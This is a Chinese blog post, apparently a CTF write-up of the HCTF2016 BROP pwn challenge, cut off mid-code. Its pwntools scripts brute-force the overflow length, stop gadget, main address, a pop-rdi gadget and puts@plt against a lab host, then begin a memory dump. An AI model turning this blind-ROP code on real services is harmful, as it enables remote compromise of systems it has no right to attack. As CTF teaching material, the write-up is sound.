<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="mango">
    
    <title>
        
            BROP |
        
        House of Mango
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/mango/favicon-16x16.png">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#FFCCCC","title":"House of Mango","author":"mango","avatar":"/images/mango/android-chrome-96x96.png","logo":"/images/mango/android-chrome-96x96.png","favicon":"/images/mango/favicon-16x16.png"},"menu":{"Archives":"/archives","Tags":"/tags","Categories":"/categories","About":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Keep loving","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"category":false,"tag":false,"announcement":null},"post":{"author_badge":{"enable":false,"level_badge":false,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null}},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":false},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2023,"word_count":false,"icp":{"enable":false,"record_code":null,"url":"https://beian.miit.gov.cn"},"site_deploy":{"enable":false,"provider":"github","url":null},"shields_style":{"enable":false,"custom":[{"link_url":null,"img_url":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","version":"4.0.6"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>


<main class="page-container border-box">

    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/mango/android-chrome-96x96.png">
                </a>
            
            <a class="site-name border-box" href="/">
               House of Mango
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    <li class="menu-item">
                        <a class=""
                           href="/"
                        >首页</a>
                    </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >归档</a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >标签</a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >分类</a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >关于</a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            <li class="drawer-menu-item flex-center">
                <a class=""
                   href="/"
                >首页</a>
            </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives"
                    >归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags"
                    >标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories"
                    >分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about"
                    >关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        BROP
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/mango/android-chrome-96x96.png">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">mango</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2024-02-01 15:15:13</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Thu Feb 01 2024 15:18:19 GMT+0800">2024-02-01 15:18:19</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/CTF/">CTF</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <i class="icon fas fa-tags"></i>&nbsp;
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/pwn/">pwn</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <p>题目是wiki上面的BROP，来自HCTF2016</p>
<p>搭好环境，因为是brop练习，所以就不用ida了。</p>
<p>因为没有二进制文件，略过checksec</p>
<h4 id="1-确定栈溢出长度"><a href="#1-确定栈溢出长度" class="headerlink" title="1.确定栈溢出长度"></a>1.确定栈溢出长度</h4><p>测得72。同时可以根据回显发现程序没有开启canary保护。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_buf_size</span>():</span><br><span class="line">    i = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.send(i * <span class="string">&quot;a&quot;</span>)  <span class="comment"># donot sendline</span></span><br><span class="line">            output = p.recv()</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> output.startswith(<span class="string">b&quot;No password&quot;</span>):</span><br><span class="line">                <span class="keyword">return</span> i - <span class="number">1</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                log.info(<span class="string">&quot;%d is not enough&quot;</span> % i)</span><br><span class="line">                i += <span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            p.close()</span><br><span class="line">            i -= <span class="number">1</span></span><br><span class="line">            log.info(<span class="string">&quot;buf_size is %d&quot;</span> % i)</span><br><span class="line">            <span class="keyword">return</span> i</span><br></pre></td></tr></table></figure>

<h4 id="2-寻找-stop-gadget"><a href="#2-寻找-stop-gadget" class="headerlink" title="2.寻找 stop gadget"></a>2.寻找 stop gadget</h4><p>其实就是找到一个让程序不崩溃的地方，比如函数入口</p>
<p>假设程序没有开启PIE，那么基地址为0x08048000或0x400000</p>
<p>先假设程序是64位的试一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_stop_addr</span>(<span class="params">buf_size, start_addr=<span class="number">0x400000</span></span>):  <span class="comment"># 32bit:0x08048000</span></span><br><span class="line">    stop_addr = start_addr</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            payload = <span class="string">b&quot;a&quot;</span> * buf_size + p64(stop_addr)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            p.recv()</span><br><span class="line">            p.close()</span><br><span class="line">            log.info(<span class="string">&quot;one success addr: 0x%x&quot;</span> % stop_addr)</span><br><span class="line">            <span class="keyword">return</span> stop_addr</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            log.info(<span class="string">&quot;one fail addr: 0x%x&quot;</span> % stop_addr)</span><br><span class="line">            stop_addr += <span class="number">1</span></span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            stop_addr -= <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>找这个地址要等好一会,得到一个0x4006b6，确实是64位程序</p>
<img     src="/pic/BROP.assets/image-20240129221920396.png"   alt="image-20240129221920396" style="zoom:67%;" >

<p>这里好死不死找到main的地址了，搞得下面出不来。换了一个0x4006ce</p>
<h4 id="3-获取main的地址"><a href="#3-获取main的地址" class="headerlink" title="3.获取main的地址"></a>3.获取main的地址</h4><p>获取main的地址这是个笼统的说法，其实是要的地址是到这个地址就会打印WelCome…的地方</p>
<blockquote>
<p>如果从程序的基地址 <code>0x400000</code> 开始寻找的话，按照 Linux ELF执行的顺序，优先找到的肯定是 <code>_start</code> 函数，所以这里也可以说是寻找 <code>_start</code> 函数，对于我们的需求来说，找到 <code>_start</code> 和 找到  <code>main</code> 是一样的</p>
</blockquote>
<p>既然我们已经找到了 <code>stop_gadget</code>，那么我们就可以把 <code>stop_gadget</code> 的地址放在我们要遍历的地址的下一条指令，这样以便能够获取被遍历的地址的返回结果。但是 <code>_start</code> 函数本身就是一个 <code>stop_gadget</code>，所以我们在这一步就不放置 <code>stop_gadget</code> 了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_main_addr</span>(<span class="params">buf_size, start_addr=<span class="number">0x400660</span></span>):</span><br><span class="line">    main_addr = start_addr</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        main_addr += <span class="number">1</span></span><br><span class="line">        payload = <span class="string">b&quot;a&quot;</span> * buf_size + p64(main_addr)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            resp = p.recv()</span><br><span class="line">            p.close()</span><br><span class="line">            log.info(</span><br><span class="line">                <span class="string">&quot;find one stop gadget: 0x%x ------------------------------------&quot;</span></span><br><span class="line">                % main_addr</span><br><span class="line">            )</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp.startswith(<span class="string">b&quot;WelCome&quot;</span>):</span><br><span class="line">                log.info(<span class="string">&quot;find main addr: 0x%x&quot;</span> % main_addr)</span><br><span class="line">                <span class="keyword">return</span> main_addr</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            log.info(<span class="string">&quot;one fail addr: 0x%x&quot;</span> % main_addr)</span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            main_addr -= <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>第一次爆的时候没爆出来，后来发现是前面的stop_gadget找的是main_addr。换了一个就好了。</p>
<img     src="/pic/BROP.assets/image-20240131234331501.png"   alt="image-20240131234331501" style="zoom:67%;" >

<h4 id="4-识别-brop-gadget"><a href="#4-识别-brop-gadget" class="headerlink" title="4.识别 brop gadget"></a>4.识别 brop gadget</h4><p>在 <code>x64</code> 的 <code>Linux</code> 用户空间环境中，参数都是通过寄存器来实现的，具体如下：</p>
<h5 id="内核接口"><a href="#内核接口" class="headerlink" title="内核接口"></a>内核接口</h5><p>内核接口使用的寄存器有<code>rdi</code>、<code>rsi</code>、<code>rdx</code>、<code>r10</code>、<code>r8</code>和<code>r9</code>。系统调用通过<code>syscall</code>指令完成。除了<code>rcx</code>、<code>r11</code>和<code>rax</code>，其他的寄存器都被保留。系统调用的编号必须在寄存器 <code>rax</code> 中传递。系统调用的参数限制为6个，不直接从堆栈上传递任何参数。返回时，<code>rax</code> 中包含了系统调用的结果，而且只有 <code>INTEGER</code> 或者 <code>MEMORY</code> 类型的值才会被传递给内核。</p>
<h5 id="用户接口"><a href="#用户接口" class="headerlink" title="用户接口"></a>用户接口</h5><p><code>x86-64</code> 下通过寄存器传递参数，这样做比通过栈具有更高的效率。它避免了内存中参数的存取和额外的指令。根据参数类型的不同，会使用寄存器或传参方式。如果参数的类型是 <code>MEMORY</code>，则在栈上传递参数。如果类型是<code>INTEGER</code>，则顺序使用 <code>rdi</code>、<code>rsi</code>、<code>rdx</code>、<code>rcx</code>、<code>r8</code> 和 <code>r9</code>。所以如果有多于 <code>6</code> 个的 <code>INTEGER</code> 参数，则后面的参数在栈上传递。</p>
<p>什么是 <code>useful gadget</code> 取决于你要利用哪个函数做哪些事，在 <code>BROP</code> 的攻击中基本上都是利用 <code>write</code> 函数和 <code>puts</code> 函数来 <code>dump</code> 内存</p>
<p><strong>puts：</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.<span class="property">h</span>&gt;</span><br><span class="line"></span><br><span class="line">int <span class="title function_">puts</span>(<span class="keyword">const</span> char *s);</span><br></pre></td></tr></table></figure>

<p>puts 函数就一个参数,所以按照用户接口的函数调用约定，只需要在 <code>rdi</code> 寄存器中设置参数就可以了，那我们需要的 <code>useful gadget</code> 就是 <code>pop rdi; ret</code> ，这个 gadget 的意思就是将栈顶的内容存储到 <code>rdi</code> 寄存器中，之后再将更新后的栈顶的地址存储到 <code>RIP</code> 寄存器中，之后系统就会执行 <code>RIP</code> 寄存器中存储的地址所指向的指令</p>
<p><strong>write：</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;unistd.<span class="property">h</span>&gt;</span><br><span class="line"></span><br><span class="line">ssize_t <span class="title function_">write</span>(int fd, <span class="keyword">const</span> <span class="keyword">void</span> *buf, size_t count);</span><br></pre></td></tr></table></figure>

<p><code>write</code> 函数共有三个参数，所以按照用户接口的函数调用约定，需要分别在 <code>rdi、rsi、rdx</code>分别设置参数，那么需要的<code>useful gadget</code> 就比较复杂了，可以分别找到 <code>pop rdi;ret</code>、<code>pop rsi;ret</code>、<code>pop rdx; ret</code>，这三个顺序可以变化，赋值顺序也跟着变就好了，当然也可以进行一些组合，比如 <code>pop rdi;pop rsi;ret</code>、<code>pop rdx;ret</code> ，当然了，如果你可以直接找到 <code>pop rdi;pop rsi; pop rdx;ret</code> 那就算你牛好了</p>
<p>比较起来，还是 <code>puts</code> 函数容易得多，由于 <code>gcc</code> 在编译 <code>c</code> 代码的过程中，对只有一个参数的 <code>printf</code> 函数有一项优化，也就是使用 <code>puts</code> 函数来替换 <code>printf</code> 函数，所以在有输出的程序中使用了 <code>puts</code> 的可能性还是挺大的。</p>
<p>然后寻找通用gadget，还是__libc_csu_init</p>
<p>在<a class="link"   target="_blank" rel="noopener" href="https://defuse.ca/online-x86-assembler.htm#disassembly%E5%8F%AF%E4%BB%A5%E6%9F%A5%E5%88%B0%60pop" >https://defuse.ca/online-x86-assembler.htm#disassembly可以查到`pop<i class="fas fa-external-link-alt"></i></a> rdi;ret&#96;的字节码是5FC3</p>
<p>在通用gadget中可以找到：</p>
<img     src="/pic/BROP.assets/image-20240131202120912.png"   alt="image-20240131202120912" style="zoom:67%;" >

<p>可以把指针位置调整，从5F开始解析，就可以获取到5FC3了。</p>
<p>现在获取gadget的任务编程了获取第一块gadget的地址</p>
<p>通过gadget的连续六个pop可以作为筛选条件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_useful_gadget</span>(<span class="params">buf_size, stop_gadget, main_addr, start_addr=<span class="number">0x4007B0</span></span>):</span><br><span class="line">    useful_gadget = start_addr</span><br><span class="line">    stop_gadget = stop_gadget</span><br><span class="line">    main_addr = main_addr</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        time.sleep(<span class="number">0.5</span>)</span><br><span class="line">        useful_gadget += <span class="number">1</span></span><br><span class="line">        payload = <span class="string">b&quot;a&quot;</span> * buf_size + p64(useful_gadget) + p64(<span class="number">1</span>) * <span class="number">6</span> + p64(main_addr)</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            resp = p.recv(timeout=<span class="number">0.5</span>)</span><br><span class="line">            p.close()</span><br><span class="line">            log.info(</span><br><span class="line">                <span class="string">&quot;find one stop gadget: 0x%x ------------------------------------&quot;</span></span><br><span class="line">                % useful_gadget</span><br><span class="line">            )</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp.startswith(<span class="string">b&quot;WelCome&quot;</span>):</span><br><span class="line">                <span class="keyword">try</span>:</span><br><span class="line">                    payload = <span class="string">b&quot;a&quot;</span> * buf_size + p64(useful_gadget) + p64(<span class="number">1</span>) * <span class="number">6</span></span><br><span class="line">                    p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">                    p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">                    p.sendline(payload)</span><br><span class="line">                    resp = p.recv()</span><br><span class="line">                    p.close()</span><br><span class="line">                <span class="keyword">except</span> EOFError:</span><br><span class="line">                    log.info(<span class="string">&quot;one useful addr: 0x%x&quot;</span> % useful_gadget)</span><br><span class="line">                    p.close()</span><br><span class="line">                    <span class="keyword">return</span> useful_gadget</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            log.info(<span class="string">&quot;not 0x%x&quot;</span> % useful_gadget)</span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            useful_gadget -= <span class="number">1</span></span><br></pre></td></tr></table></figure>

<img     src="/pic/BROP.assets/image-20240131234621112.png"   alt="image-20240131234621112" style="zoom:67%;" >

<p><code>pop rdi;ret</code>的地址是gadget+0x9</p>
<h4 id="5-确定-puts-plt-地址"><a href="#5-确定-puts-plt-地址" class="headerlink" title="5.确定 puts@plt 地址"></a>5.确定 puts@plt 地址</h4><p>可以控制rdi这个寄存器那么就可以给puts提供参数了。如果执行到某个地址后我们的参数被打印出来了，那么这个地址就是puts的plt地址</p>
<p>有了puts就可以把每个地址的内容都打印出来。</p>
<p>虽然能控制参数，但只能传递一个地址进去，所以必须知道某个地址的内容。</p>
<p>Linux ELF 文件最开始的几个字节是魔数，固定的<code>\x7fELF</code>，那么0x400000存储的内容就是<code>\x7fELF</code>。所以可以把它作为参数，看看遍历到什么地方时回打印出<code>\x7fELF</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_puts_plt</span>(<span class="params">buf_size, stop_gadget, main_addr, useful_gadget, start_addr=<span class="number">0x400540</span></span>):</span><br><span class="line">    pop_rdi_ret = useful_gadget + <span class="number">0x9</span></span><br><span class="line">    elf_magic_addr = <span class="number">0x400000</span></span><br><span class="line">    puts_plt = start_addr</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        time.sleep(<span class="number">0.5</span>)</span><br><span class="line">        puts_plt += <span class="number">1</span></span><br><span class="line">        payload = (</span><br><span class="line">            <span class="string">b&quot;a&quot;</span> * buf_size</span><br><span class="line">            + p64(pop_rdi_ret)</span><br><span class="line">            + p64(elf_magic_addr)</span><br><span class="line">            + p64(puts_plt)</span><br><span class="line">            + p64(main_addr)</span><br><span class="line">        )</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            resp1 = p.recvline(timeout=<span class="number">0.5</span>)</span><br><span class="line">            resp2 = p.recvline(timeout=<span class="number">0.5</span>)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp1.startswith(<span class="string">b&quot;\x7fELF&quot;</span>) <span class="keyword">and</span> resp2.startswith(<span class="string">b&quot;WelCome&quot;</span>):</span><br><span class="line">                p.close()</span><br><span class="line">                log.info(<span class="string">&quot;puts_plt: 0x%x&quot;</span> % puts_plt)</span><br><span class="line">                <span class="keyword">return</span> puts_plt</span><br><span class="line">            p.close()</span><br><span class="line">            log.info(</span><br><span class="line">                <span class="string">&quot;find one stop gadget: 0x%x ------------------------------------&quot;</span></span><br><span class="line">                % puts_plt</span><br><span class="line">            )</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            log.info(<span class="string">&quot;not 0x%x&quot;</span> % puts_plt)</span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            puts_plt -= <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>要注意recv()和recvline()</p>
<img     src="/pic/BROP.assets/image-20240201000359299.png"   alt="image-20240201000359299" style="zoom:67%;" >

<p>其实这里得到的地址和实际有一点偏差，但是都可以起到控制puts的作用，偏差的代码大概是类似滑板的。</p>
<h4 id="6-dump内存"><a href="#6-dump内存" class="headerlink" title="6.dump内存"></a>6.dump内存</h4><p>有了puts的plt就可以打印每一个地址的内容了，可以dump内存。</p>
<blockquote>
<p>puts 函数通过 <code>\x00</code> 进行截断，并且会在每一次输出末尾加上换行符 <code>\x0a</code>，所以有一些特殊情况需要做一些处理，比如单独的 <code>\x00</code>、<code>\x0a</code> 等，首先当然是先去掉末尾 puts 自动加上的 <code>\n</code>，然后如果 recv 到一个 <code>\n</code>，说明内存中是 <code>\x00</code>，如果 recv 到一个 <code>\n\n</code>，说明内存中是 <code>\x0a</code>。<code>p.recv(timeout=0.1)</code> 是由于函数本身的设定，如果有 <code>\n\n</code>，它很可能在收到第一个 <code>\n</code> 时就返回了，加上参数可以让它全部接收完。</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">dump_memory</span>(<span class="params"></span></span><br><span class="line"><span class="params">    buf_size,</span></span><br><span class="line"><span class="params">    stop_gadget,</span></span><br><span class="line"><span class="params">    main_addr,</span></span><br><span class="line"><span class="params">    useful_gadget,</span></span><br><span class="line"><span class="params">    puts_plt,</span></span><br><span class="line"><span class="params">    start_addr=<span 